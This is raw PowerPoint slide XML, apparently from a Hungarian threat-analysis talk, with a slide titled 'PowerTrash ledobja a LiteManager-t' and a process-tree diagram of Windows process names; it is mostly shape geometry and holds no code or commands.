                    <a:lnTo>
                      <a:pt x="978998" y="978821"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="977587" y="979106"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="916329" y="1005016"/>
                      <a:pt x="873346" y="1065672"/>
                      <a:pt x="873346" y="1136368"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="880413" y="1171373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="811434" y="1223714"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="780645" y="1243791"/>
                      <a:pt x="748183" y="1261812"/>
                      <a:pt x="714200" y="1277544"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="580284" y="1339172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446368" y="1277544"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="174559" y="1151677"/>
                      <a:pt x="0" y="879345"/>
                      <a:pt x="0" y="579401"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="133916"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="82131" y="124553"/>
                      <a:pt x="171841" y="110272"/>
                      <a:pt x="267832" y="89295"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="384325" y="63819"/>
                      <a:pt x="488793" y="32590"/>
                      <a:pt x="5802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SK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2916EAE-6C26-64FB-DC6B-9B788A64A6EF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="165925">
              <a:off x="15243452" y="5271455"/>
              <a:ext cx="989482" cy="896429"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1061267" h="961463">
                  <a:moveTo>
                    <a:pt x="481938" y="411387"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="480450" y="411387"/>
                    <a:pt x="479148" y="411833"/>
                    <a:pt x="478031" y="412726"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="476916" y="413619"/>
                    <a:pt x="475948" y="415107"/>
                    <a:pt x="475129" y="417191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="474311" y="419274"/>
                    <a:pt x="473678" y="421916"/>
                    <a:pt x="473232" y="425116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="472785" y="428316"/>
                    <a:pt x="472562" y="432148"/>
                    <a:pt x="472562" y="436613"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="472561" y="445543"/>
                    <a:pt x="473343" y="452054"/>
                    <a:pt x="474906" y="456147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="476468" y="460240"/>
                    <a:pt x="478813" y="462286"/>
                    <a:pt x="481938" y="462286"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="603382" y="462286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501137" y="687761"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="499947" y="690290"/>
                    <a:pt x="499425" y="692412"/>
                    <a:pt x="499574" y="694123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="499723" y="695835"/>
                    <a:pt x="500877" y="697248"/>
                    <a:pt x="503034" y="698365"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="505193" y="699481"/>
                    <a:pt x="508579" y="700299"/>
                    <a:pt x="513192" y="700820"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="517805" y="701341"/>
                    <a:pt x="524056" y="701602"/>
                    <a:pt x="531944" y="701602"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537749" y="701602"/>
                    <a:pt x="542623" y="701490"/>
                    <a:pt x="546567" y="701267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="550511" y="701044"/>
                    <a:pt x="553747" y="700597"/>
                    <a:pt x="556278" y="699927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="558808" y="699258"/>
                    <a:pt x="560780" y="698327"/>
                    <a:pt x="562194" y="697137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="563607" y="695946"/>
                    <a:pt x="564761" y="694383"/>
                    <a:pt x="565654" y="692448"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="660755" y="472108"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="661946" y="469281"/>
                    <a:pt x="662988" y="466639"/>
                    <a:pt x="663880" y="464183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="664773" y="461728"/>
                    <a:pt x="665480" y="459123"/>
                    <a:pt x="666001" y="456370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="666522" y="453617"/>
                    <a:pt x="666931" y="450640"/>
                    <a:pt x="667229" y="447440"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="667526" y="444241"/>
                    <a:pt x="667676" y="440483"/>
                    <a:pt x="667676" y="436167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="667676" y="430809"/>
                    <a:pt x="667415" y="426493"/>
                    <a:pt x="666894" y="423218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="666373" y="419944"/>
                    <a:pt x="665592" y="417414"/>
                    <a:pt x="664550" y="415629"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="663508" y="413842"/>
                    <a:pt x="662095" y="412689"/>
                    <a:pt x="660309" y="412168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="658522" y="411647"/>
                    <a:pt x="656290" y="411387"/>
                    <a:pt x="653612" y="411386"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="941576" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="941576" y="0"/>
                    <a:pt x="826329" y="559285"/>
                    <a:pt x="1061267" y="894021"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1035932" y="912007"/>
                    <a:pt x="1003586" y="924181"/>
                    <a:pt x="967872" y="925602"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="894586" y="928518"/>
                    <a:pt x="831483" y="883251"/>
                    <a:pt x="814387" y="825999"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="801905" y="884428"/>
                    <a:pt x="742296" y="928186"/>
                    <a:pt x="669017" y="931102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="595303" y="934036"/>
                    <a:pt x="532094" y="891536"/>
                    <a:pt x="515324" y="833798"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="503236" y="892685"/>
                    <a:pt x="443499" y="938478"/>
                    <a:pt x="369788" y="941412"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296337" y="944335"/>
                    <a:pt x="233346" y="902950"/>
                    <a:pt x="216329" y="845523"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203974" y="904119"/>
                    <a:pt x="144793" y="958401"/>
                    <a:pt x="71339" y="961324"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="71332" y="961326"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="45798" y="962342"/>
                    <a:pt x="21551" y="957692"/>
                    <a:pt x="0" y="949174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65972" y="756982"/>
                    <a:pt x="318322" y="157294"/>
                    <a:pt x="94157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SK" sz="3600" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="247154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0A73D9-EEBB-17EF-DA2E-2A518999C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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FE5E804-EF85-E8AE-8702-14410653D6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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E8EF88-DF0F-1B45-53B6-E6E46019052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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FAEADE8-BB15-5FCC-B820-BD0F39D23F8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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6BB02F6-89B2-C1E8-38A0-616FCEF85D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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{008F95FC-B5A1-C0CC-F140-BB02CB2A9494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1293942" y="4401537"/>
            <a:ext cx="7836742" cy="2380119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>PowerTrash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="6600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>ledobja a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>LiteManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="6600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>-t</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="60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Picture 7" hidden="1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E447108C-EFAD-0FF7-23D3-4BD9EE86EA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78127" y="-67586"/>
            <a:ext cx="13425772" cy="1018950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802F4E42-ED69-9FC1-B06D-24D1CC212E74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11098413" y="3098554"/>
            <a:ext cx="3145521" cy="834390"/>
            <a:chOff x="12600384" y="914400"/>
            <a:chExt cx="3145521" cy="834390"/>
          </a:xfrm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DF6FD406-AFA4-B2CE-97AB-11680121935A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12600384" y="1103018"/>
              <a:ext cx="1965678" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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64BCD07E-6AE3-3AD0-8FB4-F8AE2D2AA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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12766356" y="1162059"/>
              <a:ext cx="549560" cy="335445"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0099501B-C73E-7BF7-6C6C-4DCAA51ACD00}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341701" y="914400"/>
              <a:ext cx="2404204" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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cmd.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/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6402E16-70B6-406C-B90C-05F2C927C998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12757951" y="6601237"/>
            <a:ext cx="3145521" cy="834390"/>
            <a:chOff x="12600384" y="914400"/>
            <a:chExt cx="3145521" cy="834390"/>
          </a:xfrm>
        </p:grpSpPr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9038D3D1-FDA2-85F6-B851-E99ACB29720A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12600384" y="1103018"/>
              <a:ext cx="2849512" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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pic>
          <p:nvPicPr>
            <p:cNvPr id="56" name="Graphic 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{267964C4-02F3-C08E-EBF1-4A35B2AB1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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12766356" y="1162059"/>
              <a:ext cx="549560" cy="335445"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB26DBF6-06B4-7D6F-62F8-53896AA2C659}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341701" y="914400"/>
              <a:ext cx="2404204" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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cmd.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0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(17740)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990C1B9-9851-2B56-50DF-2127DB6BB333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13507474" y="7794856"/>
            <a:ext cx="3145521" cy="834390"/>
            <a:chOff x="12600384" y="914400"/>
            <a:chExt cx="3145521" cy="834390"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Rounded Rectangle 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{731360D5-034C-5D90-2015-8E6EF030E034}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12600384" y="1103018"/>
              <a:ext cx="2618482" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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63" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A23CE90-BC24-A450-8855-DF274DA5B134}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12677845" y="914400"/>
              <a:ext cx="3068060" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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tar.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0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(9128)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5DFCB09-93F4-DDC6-8F14-CD302C402AEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9877762" y="1585434"/>
            <a:ext cx="1902758" cy="468180"/>
            <a:chOff x="12235545" y="1103018"/>
            <a:chExt cx="1902758" cy="468180"/>
          </a:xfrm>
        </p:grpSpPr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4DEA79C2-6AB2-F62F-C7AD-22288007DCEF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12235545" y="1103018"/>
              <a:ext cx="1902757" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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77" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DE27CCD-36D9-A6FA-37F4-0650B8E04629}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12324833" y="1138270"/>
              <a:ext cx="1813470" cy="413599"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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wininit.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/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</p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86" name="Graphic 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7871ECC2-2363-C571-6229-C35370B06C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9449867" y="297960"/>
            <a:ext cx="300198" cy="300198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="87" name="Group 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24B054B1-28B3-7C0C-7FCD-DA074E5629DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9149680" y="769895"/>
            <a:ext cx="1565120" cy="468180"/>
            <a:chOff x="12512605" y="1103018"/>
            <a:chExt cx="1565120" cy="468180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="88" name="Rounded Rectangle 87">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB40305E-223D-8BE4-B4FB-68DA9696DD8B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12512605" y="1103018"/>
              <a:ext cx="1565120" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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89" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C179ED67-7891-0D76-2FC9-27950D6F5E33}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12677845" y="1110746"/>
              <a:ext cx="1384857" cy="459951"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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smss.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/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</p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="90" name="Graphic 89">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FCDF0F0-0CEC-B1A5-6509-CDFABCDA33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3215690" y="7514972"/>
            <a:ext cx="300198" cy="300198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="104" name="Elbow Connector 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A28D7227-18E2-803D-2142-760F39CA57EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="76" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="9308913" y="1250675"/>
            <a:ext cx="574856" cy="562842"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="424D5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Elbow Connector 118">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A2DC2C0-78CC-81BC-88C4-D6B9811272C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8626729" y="675367"/>
            <a:ext cx="527608" cy="318948"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1598"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="424D5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Elbow Connector 120">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFF4BD7-3B1E-C002-C485-57F3C2CA0422}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="12754308" y="7479240"/>
            <a:ext cx="944696" cy="545223"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99828"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="424D5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Elbow Connector 127">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0B7D767-143E-4B7E-F074-4F2CFE373CDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
